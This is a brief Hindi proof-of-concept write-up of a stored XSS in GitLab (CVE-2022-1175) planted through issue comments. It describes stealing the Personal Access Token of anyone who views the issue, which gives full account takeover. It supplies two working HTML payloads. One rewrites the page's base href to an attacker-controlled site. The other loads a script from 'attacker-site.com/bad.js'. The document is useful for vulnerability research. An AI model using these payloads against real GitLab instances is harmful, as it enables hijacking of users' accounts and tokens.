
GitLab संग्रहीत XSS (CVE-2022-1175) के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण जो दुर्भावनापूर्ण मुद्दा टिप्पणियों के माध्यम से व्यक्तिगत पहुँच टोकन चोरी और खाता अधिग्रहण को सक्षम बनाता है।
Gitlab Stored XSS, जिसे किसी प्रोजेक्ट के इश्यू में सेट किया जा सकता है, चाहे वह आपका अपना हो या किसी अन्य उपयोगकर्ता का। इससे हमले संभव होते हैं जैसे कि इश्यू देखने वाले किसी भी व्यक्ति का Personal Access Token (PAT) बनाना और चुराना। PAT उपयोगकर्ता को पूर्ण Gitlab API एक्सेस प्रदान कर सकता है, जो पूर्ण खाता अधिग्रहण के बराबर है।
प्रोजेक्ट के आधार को अपनी साइट पर बदलकर इसका दुरुपयोग किया जा सकता है, ताकि स्क्रिप्ट आपकी साइट से स्रोतित हों। अपनी साइट पर जावास्क्रिप्ट को पेज में कॉल किए जा रहे स्क्रिप्ट नामों से मेल खाने के लिए बदलें। हालांकि, इससे पेज पर चीज़ें टूट सकती हैं।
<pre data-sourcepos=""%22 href="x"></pre><base href=http://unsafe-website.com/><pre x=""><code></code></pre>
साइट की CSP नीति पर निर्भर करते हुए मानक स्क्रिप्ट इन्क्लूड भी काम करता है। यह अधिक छिपा हुआ है।
<pre data-sourcepos=""%22 href="x"></pre><script src="https://attacker-site.com/bad.js"></script><pre x=""><code></code></pre>
GitLab डेवलपर्स ने कोड में पूर्ण XSS स्ट्रिंग शामिल की है, जो यहाँ पाई जा सकती है:
https://gitlab.com/gitlab-org/gitlab/-/compare/v14.9.1-ee...v14.9.2-ee?from_project_id=278964&page=4
Reference:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1175